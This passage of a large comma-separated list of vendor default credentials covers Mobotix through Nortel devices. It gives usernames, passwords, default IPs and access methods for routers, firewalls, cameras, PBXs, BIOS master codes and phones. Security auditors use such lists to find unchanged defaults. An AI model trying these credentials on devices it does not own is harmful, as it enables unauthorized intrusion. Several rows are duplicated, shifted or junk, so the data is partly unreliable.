10.1.0.11),\nmobotix,M10,,192.168.x.x,admin,meinsm,,,\nmobotix,M10,,HTTP,admin,meinsm,192.168.x.x,,\nmobotix,M10,,ISDN Dial in,linux,tux,,,\nmobotix,M12,,http,admin,meinsm,http,,\nmobotix,M22M,,10.1.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.1.0.11),\nmobotix,M24M,,10.1.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.1.0.11),\nmobotix,MOBOTIX M12,,http,admin,meinsm,http,,\nmobotix,Q22M,,10.8.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.8.0.11),\nmobotix,Q24M,,10.8.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.8.0.11),\nmobotix,S14,,10.8.0.11,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.8.0.99),\nmobotix,T24MX,,,admin,admin,Admin,,\nmobotix,Windows XP,all versions,http://192.168.0.1,,ronda_atocha,guest,,\nmobotix,abosalem,1,aaa,abosalem,1407,,,\nmobotix,m22-m,m22-m,http://10.3.148.115,admin,meinsm,Admin,admin,\nmotive,Chorus,,,admin,isee,Admin,,\nmotorola,Cablerouter,,,cablecom,router,,,\nmotorola,Cablerouter,,Admin,cablecom,router,,,\nmotorola,Cablerouter,,Telnet,cablecom,router,Admin,,\nmotorola,Canopy 5.7 GHz,,169.254.1.1,admin,,Admin,,\nmotorola,Canopy 900 MHz,,169.254.1.1,root,,Admin,,\nmotorola,DPC-550 cell phone,,keypad,,0,unlocks the phone,,\nmotorola,DPC-550 cell phone,,keypad,,000000000000,unlocks the phone,,\nmotorola,DPC-550 cell phone,,keypad,,1.23E+11,unlocks the phone,,\nmotorola,DPC-550 cell phone,,keypad,,123456123456,unlocks the phone,,\nmotorola,FX7400,1,HTTP://,admin,change,Admin Access,This was a pain in the ass to find.,\nmotorola,Motorola Cablerouter,,,cablecom,router,Admin,,\nmotorola,SB5100,,http://192.168.100.1,,,Administration,,\nmotorola,SB5120,,http://192.168.100.1,,,Administration,,\nmotorola,SBG900,,HTTP,admin,motorola,Admin,,\nmotorola,SURFboard,,,technician,yZgO8Bvj,,,\nmotorola,Various,,,service,smile,,,\nmotorola,Various,,,setup,,,,\nmotorola,WR850G Router,,,admin,password,,,\nmotorola,WR850G,4.03,HTTP,admin,motorola,Admin,higher revisions likely the same,\nmotorola,WR850R,,HTTP,admin,motorola,,,\nmotorola,Wireless Router,WR850G,HTTP,admin,motorola,Admin,,\nmotorola,vanguard,,Multi,,,Admin,,\nmotorola,wr850r,,,admin,motorola,,,\nmp3mystic,MP3Mystic,,,admin,mp3mystic,,,\nmp3mystic,MP3Mystic,,http,admin,mp3mystic,Admin,,\nmro software,maximo,,Admin,SYSADM,sysadm,,,\nmro software,maximo,,v4.1,SYSADM,sysadm,,,\nmrosoftware,maximo,v4.1,Multi,SYSADM,sysadm,Admin,,\nmrv,3312-4c,,Multi,admin,admin,all,,\nmrv,3312-4c,,all,admin,admin,,,\nmsi,RG54GS,,192.168.1.254,,admin,Admin,,\nmtechnology,PC BIOS,,Console,,mMmM,Admin,,\nmultitech,RASExpress Server,,,guest,,,5.30a,\nmutare software,EVM Admin,,All,,admin,,,\nmutaresoftware,EVM Admin,All,HTTP,,admin,Admin,,\nmuze,Ariadne,,2.2.1,admin,muze,,,\nmuze,Ariadne,2.2.1,http,admin,muze,Admin,,\nmy test,1.0,,You,Loser,1234,,,\nmysql,Eventum,,,admin@example.com,admin,,,\nmysql,Eventum,,http,admin@example.com,admin,Admin,,\nmysql,MySQL,,,root,,,,\nmysql,MySQL,all,,root,,Admin,,\nnai,Entercept,,Management console,GlobalAdmin,GlobalAdmin,Admin, : must be changed at 1st connection,\nnai,Entercept,,Management console,GlobalAdmin,GlobalAdmin,Admin,: must be changed at 1st connection,\nnai,Intrushield IPS,1200/2600/4000,SSH + Web console,admin,admin123,Admin,,\nnanoteq,NetSeq firewall,,,admin,NetSeq,,*,\nnanoteq,NetSeq,,,admin,NetSeq,,,\nncr,NCR UNIX,,,ncrm,ncrm,,,\nncr,NCR UNIX,,Admin,ncrm,ncrm,,,\nncr,NCR UNIX,,Multi,ncrm,ncrm,Admin,,\nnec,Aspire UltraMail,,192.168.1.250,2000,CTL,,,\nnec,Aspire webpro,,172.16.0.10,ASPIRE,12345678,Admin,,\nnec,DT700 Phone,All versions,press the HOLD,TRF,*,# keys in order,ADMIN (caps sensitive),6633222\nnec,Elite IPK,,,admin,password,,,\nnec,WARPSTAR-BaseStation,,Telnet,,,Admin,,\nnec,phw10801,powermate p6050,console,,,guest,,\nnetapp,NetCache,,,admin,NetCache,,,\nnetapp,NetCache,,,admin,NetCache,,any,\nnetapp,SANscreen,,,admin,admin123,,,\nnetapp,SANscreen,5.1.3,http,admin,admin123,Admin,,\nnetbotz,Netbotz Appliances,,,netbotz,netbotz,,,\nnetcomm,3G17WV,,192.168.20.1,admin,admin,Admin,,\nnetcomm,3G17Wn,,192.168.20.1,admin,admin,Admin,,\nnetcomm,3G18WV,,192.168.20.1,admin,admin,Admin,,\nnetcomm,3G18Wn,,192.168.20.1,admin,admin,Admin,,\nnetcomm,3G21WB,,10.0.0.138,admin,admin,Admin,,\nnetcomm,3G9WB,,10.0.0.138,admin,admin,Admin,,\nnetcomm,3GT1WN,,10.0.0.138,admin,admin,Admin,,\nnetcomm,GTV300,all,192.168.30.1,admin,admin,Admin,web,\nnetcomm,GTV300,all,192.168.30.1,root,NetC0mmV3oo,Admin,telnet,\nnetcomm,N3G002W,,192.168.123.254,admin,admin,Admin,,\nnetcomm,N3G005W,,192.168.123.254,,admin,Admin,,\nnetcomm,N3G9W,,10.0.0.1,admin,admin,Admin,,\nnetcomm,N3G9W,Supplied by Telstra,10.0.0.138,admin,admin,Admin,,\nnetcomm,NB1,,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB11W,,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB12WD,,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB1300+4,,,admin,password,,,\nnetcomm,NB1300+4,all,Multi,admin,password,,,\nnetcomm,NB1300,,,admin,password,,,\nnetcomm,NB1300,all,192.168.1.1 or 192.168.0.1,admin,password,Admin,,\nnetcomm,NB1300,all,Multi,admin,password,,,\nnetcomm,NB1300PLUS4,all,192.168.1.1,admin,password,Admin,,\nnetcomm,NB1300PLUS4W,all,192.168.1.1,admin,password,Admin,,\nnetcomm,NB14,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB1400,all,192.168.1.1,admin,password,Admin,,\nnetcomm,NB14WN,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB2800,all,192.168.1.1,,admin,Admin,,\nnetcomm,NB3000,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB304N,all,192.168.1.1 (ethernet) or 192.168.1.2 (USB),root,root,root,,\nnetcomm,NB3100,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB3300,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB4,all,192.168.1.1,admin,password,Admin,,\nnetcomm,NB5,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB5,all,192.168.1.1,root,root,Admin,,\nnetcomm,NB504,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB5540,all,192.168.1.1,,admin,Admin,,\nnetcomm,NB5580 / NB5580W,,,,admin,Admin,Any user name (or blank) is valid with this password,\nnetcomm,NB5580,,,,admin,Admin,Any user name (or blank) is valid with this password,\nnetcomm,NB5580,,,admin,admin,Admin,,\nnetcomm,NB5580W,,,,admin,Admin,Any user name (or blank) is valid with this password,\nnetcomm,NB5580W,,,admin,admin,Admin,,\nnetcomm,NB5PLUS4,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB5PLUS4W,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB6,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB600W,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB604N,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB620W,all,192.168.1.1,admin,,Admin,,\nnetcomm,NB6PLUS4,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB6PLUS4W,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB6PLUS4WN,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB6W,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB7,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB750,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB7PLUS4W,,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB8W,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB9,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB9W,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB9WMAXX,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NB9WMAXXN,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NBF3ADV,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NP740N,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NP800N,all,192.168.20.1,admin,admin,Admin,,\nnetcomm,NP801N,all,192.168.20.1,admin,admin,Admin,,\nnetcomm,NP802N,all,192.168.20.1,admin,admin,Admin,,\nnetcomm,NP803N,all,192.168.20.1,admin,admin,Admin,,\nnetcomm,NP804N,all,192.168.1.1,admin,admin,Admin,,\nnetcomm,NTC-5908,all,192.168.1.1,root,admin,Admin,,\nnetcomm,V100,all,DHCP or fixed IP,root,NetC0mmV1oo,Admin,,\nnetcomm,V200,all,192.168.30.1,root,NetC0mmV2oo,Admin,,\nnetcomm,V210P,all,192.168.22.1,admin,admin,Admin,,\nnetcomm,V300,all,192.168.30.1,admin,admin,Admin,web,\nnetcomm,V300,all,192.168.30.1,root,NetC0mmV3oo,Admin,telnet,\nnetcomm,V300MNF,all,192.168.30.1,admin,admin,Admin,web,\nnetcomm,V300MNF,all,192.168.30.1,root,NetC0mmV3oo,Admin,telnet,\nnetcomm,V300MNF,all,DHCP,admin,admin,Admin,,\nnetcordia,NetMRI,,http,admin,admin,Admin,,\nnetgear fr314,Firewall router,,,admin,password,,,\nnetgear fr314,Firewall router,,Admin,admin,password,,,\nnetgear,802.11b Wireless Cable/DSL router,,MR814,admin,password,,,\nnetgear,CG2003,,192.168.0.1,admin,password,Admin,,\nnetgear,CG3000,,192.168.0.1,MSO,changeme,Super User,,\nnetgear,CG3000,,192.168.0.1,admin,password,Admin,,\nnetgear,CG3000D-RG,,http://192.168.0.1,chtruser,charter,administrator,this is the charter cable residential gateway. the sticker on the side of the unit incorrectly identifies the Netgear default userid/password of admin/password. As indicated the firmware defaults are userid: chtruser,password: charter\nnetgear,CG3100,,192.168.0.1 or 192.168.100.1,admin,password,Admin,,\nnetgear,CG814GCMR,,http://192.168.0.1,admin,password,admin,charter communications,\nnetgear,CG814WB,,192.168.0.1,admin,password,Admin,,\nnetgear,CG814WG,v2,192.168.0.1,comcast,1234,setup,,\nnetgear,CGD24N,,192.168.0.1 or 192.168.100.1,admin,password,Admin,,\nnetgear,CGD24N,,192.168.0.1 or 192.168.100.1,superuser,password,Admin,,\nnetgear,CVG824G,,192.168.0.1,admin,password,Admin,,\nnetgear,Cable/DSL Router,,RT-314,admin,1234,,,\nnetgear,Comcast,Comcast-supplied,HTTP,comcast,1234,diagnostics page,192.168.0.1/docsisdevicestatus.html,\nnetgear,DG632 ADSL Modem,V3.3.0a_cx,HTTP,admin,password,Admin,,\nnetgear,DG632,,http://192.168.0.1,admin,password,Administration,,\nnetgear,DG814 Router,,,admin,password,Admin,,\nnetgear,DG824G,,,admin,password,Admin,,\nnetgear,DG824M,,,admin,password,Admin,,\nnetgear,DG834,,http://192.168.0.1,admin,password,Administration,,\nnetgear,DG834G,,,,admin,Admin,,\nnetgear,DG834G,,,,zebra,,,\nnetgear,DG834G,,http://192.168.0.1,admin,password,Administration,,\nnetgear,DG834G,,telnet,,zebra,Admin,,\nnetgear,DG834GT,V1.03.87,http://192.168.0.1,,,root,,\nnetgear,DG834GV,,192.168.0.1,admin,password,Admin,,\nnetgear,DG834GVSP,,192.168.0.1,admin,password,Admin,,\nnetgear,DG834PN RangeMax ADSL Wireless Router,,,admin,password,,,\nnetgear,DG934G,,,admin,sky,admin,,\nnetgear,DGFV338,,192.168.1.1,admin,password,Admin,,\nnetgear,DGN1000,,192.168.1.1,admin,password,Admin,,\nnetgear,DGN2000,,192.168.1.1,admin,password,Admin,,\nnetgear,DGN2200,,192.168.1.1,admin,password,Admin,,\nnetgear,DGN2200M,,192.168.1.1,admin,password,Admin,,\nnetgear,DGN3500,,192.168.1.1,admin,password,Admin,,\nnetgear,DGND3300,,192.168.0.1,admin,password,Admin,,\nnetgear,DGND3700,,192.168.0.1,admin,password,Admin,,\nnetgear,DIR300,,192.168.0.1,admin,password,Admin,,\nnetgear,DM11P,,192.168.0.1,admin,password,Admin,,\nnetgear,DM602,,192.168.0.1,admin,password,Admin,,\nnetgear,DM602,,FTP Telnet and HTTP,admin,password,Admin,,\nnetgear,EVG2000,,10.0.0.138,admin,admin,Admin,,\nnetgear,FM114P,,192.168.0.1,admin,password,Admin,,\nnetgear,FM114P,,Multi,,,Admin,,\nnetgear,FR114P,,192.168.0.1,admin,password,Admin,,\nnetgear,FR114P,,HTTP,admin,password,Admin,,\nnetgear,FR314,,HTTP,admin,password,Admin,,\nnetgear,FR328S,,192.168.0.1,admin,password,Admin,,\nnetgear,FVS114,,192.168.0.1,admin,password,Admin,,\nnetgear,FVS318,,192.168.0.1,admin,password,Admin,,\nnetgear,FVS318,,HTTP,admin,password,Admin,,\nnetgear,FVS318G,,192.168.1.1,admin,password,Admin,,\nnetgear,FVS336G,,192.168.1.1,admin,password,Admin,,\nnetgear,FVS338,,192.168.1.1,admin,password,Admin,,\nnetgear,FVS338,,HTTP,admin,password,Admin,,\nnetgear,FVX538,,192.168.0.1,admin,password,Admin,,\nnetgear,FWG114P,,192.168.0.1,admin,password,,,\nnetgear,FWG114P,,Multi,,admin,password,,\nnetgear,GS110TP,,192.168.0.239,,password,Admin,Switch may be on a different IP address if a DHCP server is available,\nnetgear,GS724T,V1.0.1_1104,HTTP,,password,Admin,,\nnetgear,GS724t,V1.0.1_1104,HTTP,,password,Admin,,\nnetgear,GSM7224,,HTTP,admin,,Admin,,\nnetgear,KWGR614,,www.routerlogin.net,admin,password,Admin,,\nnetgear,ME102 ,,SNMP,,private,Admin,Standard IP-Address is 192.168.0.5,\nnetgear,ME102,,192.168.1.254,,default,Admin,,\nnetgear,ME102,,SNMP,,private,Admin,Standard IP-Address is 192.168.0.5,\nnetgear,MR-314,,3.26,admin,1234,,,\nnetgear,MR-314,,Admin,admin,1234,,,\nnetgear,MR-314,3.26,HTTP,admin,1234,Admin,,\nnetgear,MR314,,192.168.0.1,admin,password,Admin,,\nnetgear,MR314,,Multi,admin,1234,Admin,,\nnetgear,MR314,3.26,HTTP,admin,1234,Admin,,\nnetgear,MR814,,192.168.0.1,admin,password,Admin,,\nnetgear,MR814,,HTTP,admin,password,Admin,,\nnetgear,N600,,,admin,password,,,\nnetgear,RM356,,Admin,,1234,,,\nnetgear,RM356,,None,,1234,,,\nnetgear,RM356,,Telnet,,1234,Admin,shutdown the router via internet,\nnetgear,RM356,None,Telnet,,1234,Admin,shutdown the router via internet,\nnetgear,RP114,,,admin,1234,,,\nnetgear,RP114,,192.168.0.1,admin,1234,Admin,,\nnetgear,RP114,,3.26,,1234,,,\nnetgear,RP114,,Admin,admin,1234,,,\nnetgear,RP114,,Multi,admin,1234,admin,,\nnetgear,RP114,,Telnet,admin,1234,Admin,,\nnetgear,RP114,,admin,admin,1234,,,\nnetgear,RP114,3.20-3.26,HTTP,admin,1234,Admin,default http://192.168.0.1,\nnetgear,RP114,3.26,Telnet,,1234,Admin,telnet 192.168.0.1,\nnetgear,RP614,,,admin,password,,,\nnetgear,RP614,,Admin,admin,password,,,\nnetgear,RP614,,HTTP,admin,password,Admin,,\nnetgear,RT-311,,Admin,Admin,1234,,,\nnetgear,RT-311,,HTTP,Admin,1234,Admin,,\nnetgear,RT311,,,Admin,1234,,Any,\nnetgear,RT311,,HTTP,Admin,1234,Admin,,\nnetgear,RT311/RT314,,,admin,1234,,,\nnetgear,RT314,,,admin,admin,,,\nnetgear,RT314,,192.168.0.1,admin,1234,Admin,,\nnetgear,RT314,,Admin,admin,1234,,,\nnetgear,RT314,,Admin,admin,admin,,,\nnetgear,RT314,,HTTP and Telnet,admin,1234,Admin,,\nnetgear,RT314,,HTTP,admin,admin,Admin,,\nnetgear,Ready NAS Duo,,http or Raidar,admin,netgear1,system setup,,\nnetgear,ReadyNAS,,,admin,netgear1,,,\nnetgear,Router,,DG814,admin,password,,,\nnetgear,Router/Modem,,Multi,admin,password,Admin,,\nnetgear,TA612V,,192.168.61.1,admin,password,Admin,,\nnetgear,WAP54G,,,,admin,Admin,,\nnetgear,WG302,,,admin,password,,,\nnetgear,WG302,,HTTP,admin,password,,,\nnetgear,WG602 Router,2,,admin,password,,,\nnetgear,WG602,,192.168.0.227,admin,password,Admin,,\nnetgear,WG602,,Firmware Version 1.04.0,super,5777364,,,\nnetgear,WG602,,Firmware Version 1.5.67,super,5777364,,,\nnetgear,WG602,,Firmware Version 1.7.14,superman,21241036,,,\nnetgear,WG602,Firmware Version 1.04.0,HTTP,super,5777364,Admin,,\nnetgear,WG602,Firmware Version 1.5.67,HTTP,super,5777364,Admin,,\nnetgear,WG602,Firmware Version 1.7.14,HTTP,superman,21241036,Admin,,\nnetgear,WGE101,,,admin,password,Admin,,\nnetgear,WGR-614,,admin,admin,password,,,\nnetgear,WGR101 Router,,,admin,password,,,\nnetgear,WGR613V,,192.168.61.1,admin,password,Admin,,\nnetgear,WGR614 Router,v4,,admin,setup,Admin,,\nnetgear,WGR614,,192.168.0.1 or 192.168.1.1,admin,password,Admin,,\nnetgear,WGR614,v5,http://192.168.0.1 or http://routerlogin.net/,admin,password,Administration,,\nnetgear,WGR614L,,192.168.61.1,admin,admin,Admin,,\nnetgear,WGR624 Router,,,admin,password,,,\nnetgear,WGT624,,http://192.168.0.1,admin,password,Administration,,\nnetgear,WGT624,,http://192.168.1.1,admin,password,Administration,,\nnetgear,WGT634U,,192.168.1.1,admin,password,Admin,,\nnetgear,WGT634U,,HTTP,admin,password,Admin,,\nnetgear,WGU624,,http://192.168.1.1,admin,password,Administration,,\nnetgear,WGX102,AP,192.168.0.101,admin,password,Admin,SSID is NETGEAR,\nnetgear,WN2000RPT,,http://192.168.0.1,admin,password,Administration,,\nnetgear,WNAP320,AP,192.168.0.100,admin,password,Admin,SSID is NETGEAR_11ng,\nnetgear,WNDAP620,AP,192.168.0.100,admin,password,Admin,,\nnetgear,WNDR3300,,192.168.1.1,admin,password,admin,,\nnetgear,WNDR3300,all,http://192.168.0.1,,,admin,,\nnetgear,WNDR3400,,192.168.1.1,admin,password,admin,,\nnetgear,WNDR3700,,192.168.1.1,admin,password,admin,,\nnetgear,WNDR3800,,192.168.1.1 or www.routerlogin.net or www.routerlogin.com,admin,password,admin,,\nnetgear,WNDR4000,,192.168.0.1 or www.routerlogin.com,admin,password,admin,,\nnetgear,WNDR4500,,192.168.1.1,admin,password,admin,,\nnetgear,WNR2000,,192.168.0.1,admin,password,admin,,\nnetgear,WNR3500,,192.168.1.1,admin,password,admin,,\nnetgear,WNR3500L,,192.168.1.1,Admin,Password,admin,,\nnetgear,WNR834B,,192.168.1.1,admin,password,admin,,\nnetgear,WNR854T,,,admin,password,admin,,\nnetgear,WPN824,,http://192.168.1.1,admin,password,,,\nnetgear,WPN824N,,http://192.168.1.1,admin,password,,,\nnetgear,WPNT834,,192.168.1.1,admin,admin,admin,,\nnetgear,wpn824,,,edel,1234567,,,\nnetgeatr,RP114,,3.20-3.26,admin,1234,,,\nnetgenesis,NetAnalysis Web Reporting,,,naadmin,naadmin,,,\nnetgenesis,NetAnalysis Web Reporting,,Admin,naadmin,naadmin,,,\nnetgenesis,NetAnalysis Web Reporting,,HTTP,naadmin,naadmin,Admin,,\nnetopia,3351,,Multi,,,Admin,,\nnetopia,4542,,Multi,admin,noway,Admin,,\nnetopia,Caiman 3200,3200,http://192.168.1.1,admin,1234,,,\nnetopia,Netopia 7100,,,,,,,\nnetopia,Netopia 7100,,Admin,,,,,\nnetopia,Netopia 7100,,Telnet,,,Admin,,\nnetopia,Netopia 9500,,,netopia,netopia,,,\nnetopia,Netopia 9500,,Admin,netopia,netopia,,,\nnetopia,Netopia 9500,,Telnet,netopia,netopia,Admin,,\nnetopia,R7100,,,admin,admin,,4.6.2,\nnetopia,R910,,Multi,admin,,Admin,,\nnetopia,routers,,,factory,(see note),,,\nnetport,Express 10/100,,,setup,setup,,,\nnetport,Express 10/100,,Admin,setup,setup,,,\nnetport,Express 10/100,,multi,setup,setup,Admin,,\nnetscape,Enterprise Server,,http,admin,admin,Admin,,\nnetscape,Netscape Enterprise Server,,,admin,admin,,,\nnetscreen,Firewall,,,netscreen,netscreen,,,\nnetscreen,Firewall,,Admin,netscreen,netscreen,,,\nnetscreen,Firewall,,multi,netscreen,netscreen,Admin,,\nnetscreen,IDP,,2.0p1,admin,netscreen,,,\nnetscreen,IDP,2.0p1,,admin,netscreen,Admin,,\nnetscreen,NS-5 NS10 NS-100,,,netscreen,netscreen,,,\nnetscreen,Netscreen,,,netscreen,netscreen,,,\nnetscreen,all firewalls,,all,netscreen,netscreen,,,\nnetscreen,firewall,,HTTP,Administrator,,Admin,,\nnetscreen,firewall,,Telnet,Administrator,,Admin,,\nnetscreen,firewall,,Telnet,admin,,Admin,,\nnetscreen,firewall,,Telnet,operator,,Admin,,\nnetscreen,ns-25,,,,,,,\nnetscreen,ns-25,,Admin,,,,,\nnetscreen,ns-25,,Multi,,,Admin,,\nnetstar,Netpilot,,,admin,password,,,\nnetstar,Netpilot,,Multi,admin,password,Admin,,\nnetwork appliance,NetCache,,Admin,admin,NetCache,,,\nnetwork appliance,NetCache,,any,admin,NetCache,,,\nnetwork associates,WebShield Security Appliance e250,,,e250,e250changeme,,,\nnetwork associates,WebShield Security Appliance e250,,Admin,e250,e250changeme,,,\nnetwork associates,WebShield Security Appliance e500,,,e500,e500changeme,,,\nnetwork associates,WebShield Security Appliance e500,,Admin,e500,e500changeme,,,\nnetworkappliance,NetCache,any,Multi,admin,NetCache,Admin,,\nnetworkassociates,WebShield Security Appliance e250,,HTTP,e250,e250changeme,Admin,,\nnetworkassociates,WebShield Security Appliance e500,,HTTP,e500,e500changeme,Admin,,\nnetworkeverywhere,NWR11B,,HTTP,,admin,Admin,,\nnetworkice,ICECap Manager,,2.0.22 <,iceman,,,,\nnetworkice,ICECap Manager,below 2.0.22,port 8081,iceman,,Admin,,\nnewbridge,Congo/Amazon/Tigris,,,netman,netman,,All versions,\nnewmedianetgmbh,DD-WRT,,,root,admin,,,\nnexland,ISB SOHO,,http://192.168.0.1,admin,,Administration,,\nnexland,ISB2LAN,,http://192.168.0.1,user:,,Administration,,\nnexland,Pro100,,http://192.168.0.1,user:,,Administration,,\nnexland,Pro400,,http://192.168.0.1,user:,,Administration,,\nnexland,Pro800 Turbo,,http://192.168.0.1,admin,,Administration,,\nnexsan,ATABoy2F,8.10f,http,ADMIN,PASSWORD,Admin,,\nnext,NeXTStep,,,me,,,,\nnext,NeXTStep,,,root,NeXT,,,\nnext,NeXTStep,,,signa,signa,,,\nnext,NeXTStep,,Admin,root,NeXT,,,\nnext,NeXTStep,,Multi,me,,User,,\nnext,NeXTStep,,Multi,root,NeXT,Admin,,\nnext,NeXTStep,,Multi,signa,signa,User,,\nnext,NeXTStep,,User,me,,,,\nnext,NeXTStep,,User,signa,signa,,,\nngsec,NGSecureWeb,,HTTP,admin,,Admin,,\nngsec,NGSecureWeb,,HTTP,admin,asd,Admin,,\nngsecure,The Hooy,,1,admin,admin,,,\nngsecure,The Hooy,,Admin,admin,admin,,,\nnicesystemsltd,NICELog,,,Administrator,nicecti,Admin,,\nnicesystemsltd,NICELog,,,Nice-admin,nicecti,Admin,,\nniksun,NetDetector,,,vcr,NetVCR,,,\nniksun,NetDetector,,Multi,vcr,NetVCR,Admin,su after login with empty password,\nniksun,c208,6.1,console,,,admin,it is not login vcr!!!,\nnimble,BIOS,,Console,,xdfk9874t3,Admin,,\nnimble,PC BIOS,,,,xdfk9874t3,,,\nnimble,PC BIOS,,Admin,,xdfk9874t3,,,\nnimble,PC BIOS,,Console,,xdfk9874t3,Admin,,\nnixdorf,Siemens Nixdorf PC BIOS,,Console,,SKY_FOX,Admin,,\nno,no,,microsoft,9000,1234567890,,,\nnokia,7360,,Multi,,9999,Admin,,\nnokia,770,,,root,rootme,Admin,,\nnokia,DSL Router M1122,,1.1 - 1.2,m1122,m1122,,,\nnokia,DSL Router M1122,,Administrator,Telecom,Telecom,,,\nnokia,DSL Router M1122,,Multi,Telecom,Telecom,Administrator,,\nnokia,DSL Router M1122,,User,m1122,m1122,,,\nnokia,DSL Router M1122,1.1 - 1.2,Multi,m1122,m1122,User,,\nnokia,M10,,,Telecom,Telecom,,,\nnokia,MW1122,,Multi,telecom,telecom,Admin,Only in New Zealand.,\nnokia,all mobiles,,Security Code,nop,12345,,,\nnokia,all mobiles,nop,Multi,nop,12345,Security Code,,\nnokia,most Nokia cell phones,all,except some of newest models,*3001#12345#,,, can be reset.,\nnokia,most Nokia cell phones,all,except some of newest models,*3001#12345#,,,goes into the program screen shows security code can be reset.,\nnokia,n800,all,ssh (remote or localhost),root,rootme,root user,by default ssh not installed,\nnokia,nokia,,,root,nokia,,,\nnokia,nokia,,security code,nop,123454,,,\nnokia,phone,,voicemail,client,client,,,\nnorstar,Meridian KSU,,Admin,**23646,23646,,,\nnorstar,Meridian KSU,,Config,**266344,266344,,,\nnortel,Accelar (Passport) 1000 series routing switches,,,l2,l2,,,\nnortel,Accelar (Passport) 1000 series routing switches,,,l3,l3,,,\nnortel,Accelar (Passport) 1000 series routing switches,,,ro,ro,,,\nnortel,Accelar (Passport) 1000 series routing switches,,,rw,rw,,,\nnortel,Accelar (Passport) 1000 series routing switches,,,rwa,rwa,,,\nnortel,Accelar (Passport) 1000 series routing switches,,Layer 2 Read Write,l2,l2,,,\nnortel,Accelar (Passport) 1000 series routing switches,,Layer 3 (and layer 2) Read Write,l3,l3,,,\nnortel,Accelar (Passport) 1000 series routing switches,,Multi,l2,l2,Layer 2 Read Write,,\nnortel,Accelar (Passport) 1000 series routing switches,,Multi,l3,l3,Layer 3 (and layer 2) Read Write,,\nnortel,Accelar (Passport) 1000 series routing switches,,Multi,ro,ro,Read Only,,\nnortel,Accelar (Passport) 1000 series routing switches,,Multi,rw,rw,Read Write,,\nnortel,Accelar (Passport) 1000 series routing switches,,Multi,rwa,rwa,Read Write All,,\nnortel,Accelar (Passport) 1000 series routing switches,,Read Only,ro,ro,,,\nnortel,Accelar (Passport) 1000 series routing switches,,Read Write All,rwa,rwa,,,\nnortel,Accelar (Passport) 1000 series routing switches,,Read Write,rw,rw,,,\nnortel,BCM,,3.5 - 3-7,administrator,PlsChgMe!,,,\nnortel,BCM,,3.5 - 3-7,supervisor,visor,,,\nnortel,BayStack,,310/303,,secure,,,\nnortel,Baystack 350-24T,,,,secure,,,\nnortel,Baystack 350-24T,,Admin,,secure,,,\nnortel,Baystack or Etherswitch 460/470/5500,,SNMP or Java Device Manager,RO,user,Read Only,,\nnortel,Baystack or Etherswitch 460/470/5500,,SNMP or Java Device Manager,RW,secure,Admin,,\nnortel,Baystack,310/303,,,,Admin,,\nnortel,Baystack,310/303,,,secure,Admin,,\nnortel,Baystack,350-24T,Telnet,,secure,Admin,,\nnortel,Business Communications Manager,3.5 and 3.6,https,supervisor,PlsChgMe!,Admin,Note exclamation in password,\nnortel,Business Communications Manager,3.5-3.7,,administrator,PlsChgMe!,Admin,Note exclamation in password,\nnortel,Business Communications Manager,3.5-3.7,,supervisor,visor,Admin,,\nnortel,Contivity Extranet Switches,2.x,,admin,setup,,,\nnortel,Contivity Switch,,,admin,setup,,,\nnortel,Contivity,,Admin,admin,setup,,,\nnortel,Contivity,,Extranet/VPN switches,admin,setup,,,\nnortel,Contivity,Extranet/VPN switches,HTTP,admin,setup,Admin,,\nnortel,Extranet Switches,,,admin,setup,,,\nnortel,Extranet Switches,,Admin,admin,setup,,,\nnortel,Extranet Switches,,Multi,admin,setup,Admin,,\nnortel,MIPCD,1.04,,user,,Admin,,\nnortel,MIPCD,1.04,FTP,user,user,r/w,,\nnortel,MIPCD,1.04,http,admin,admin,Admin,,\nnortel,MIPCD,1.5,,,,,,\nnortel,MIPCD,1.5,,user,,Admin,,\nnortel,MIPCD,1.5,,user,user,,,\nnortel,MIRAN,,,distrib,distrib0,Admin,,\nnortel,MIRAN,,,user,user0000,Admin,,\nnortel,MIRAN,3.xx,serial,admin,admin000,Admin,,\nnortel,Matra 6501 PBX,,,,0,,,\nnortel,Matra 6501 PBX,,Admin,,0000,,,\nnortel,Matra 6501 PBX,,Console,,0,Admin,,\nnortel,Matra 6501 PBX,,Console,,0000,Admin,,\nnortel,Meridian 1 PBX,,,0,0,,OS Release 2,\nnortel,Meridian CCR,,,ccrusr,ccrusr,,,\nnortel,Meridian CCR,,,disttech,4tas,,,\nnortel,Meridian CCR,,,maint,maint,,,\nnortel,Meridian CCR,,,service,smile,,,\nnortel,Meridian CCR,,Maintenance account,maint,maint,,,\nnortel,Meridian CCR,,Multi,disttech,4tas,engineer account,,\nnortel,Meridian CCR,,Multi,disttech,etas,engineer account,,\nnortel,Meridian CCR,,Multi,maint,maint,Maintenance account,,\nnortel,Meridian 